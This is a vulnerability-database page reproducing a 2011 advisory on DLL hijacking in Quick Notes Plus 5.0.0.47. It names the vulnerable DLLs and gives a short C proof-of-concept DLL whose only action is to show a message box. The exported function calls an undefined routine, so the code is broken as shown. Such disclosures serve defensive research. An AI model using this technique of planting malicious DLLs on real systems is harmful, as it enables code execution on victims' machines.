Lucene search
K

Quick Notes Plus 5.0.0.47 DLL Hijacking

🗓️ 05 Jan 2011 00:00:00Reported by d3c0derType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Quick Notes Plus v5.0 dll hijacking vulnerability, QNPlus.exe, mfc71loc.dll, mfc71enu.dll, Windows XP (Version 5.1 Service Pack 3

Code
`  
#############################################  
  
Quick Notes Plus v5.0 dll hijacking vulnerability  
software : QNPlus - http://www.conceptworld.com/redirect.asp?Product=QNP&Action=Home  
version : 5.0.0.47  
author : d3c0der - [email protected]  
website : www.attackerz.ir  
Operating System : Windows XP (Version 5.1 Service Pack 3)  
date : 5\1\2011  
  
############################################  
  
file : QNPlus.exe  
Vulnerable dll's :   
mfc71loc.dll   
mfc71enu.dll   
  
#############################################  
  
#include <windows.h>  
#define DllExport __declspec (dllexport)  
DllExport void DwmSetWindowAttribute() { egg(); }  
  
int pwnme()  
{  
MessageBox(0, "dll hijacked !! ", "Dll Message", MB_OK);  
exit(0);  
return 0;  
}  
  
##############################################   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Jan 2011 00:00Current
0.2Low risk
Vulners AI Score0.2
23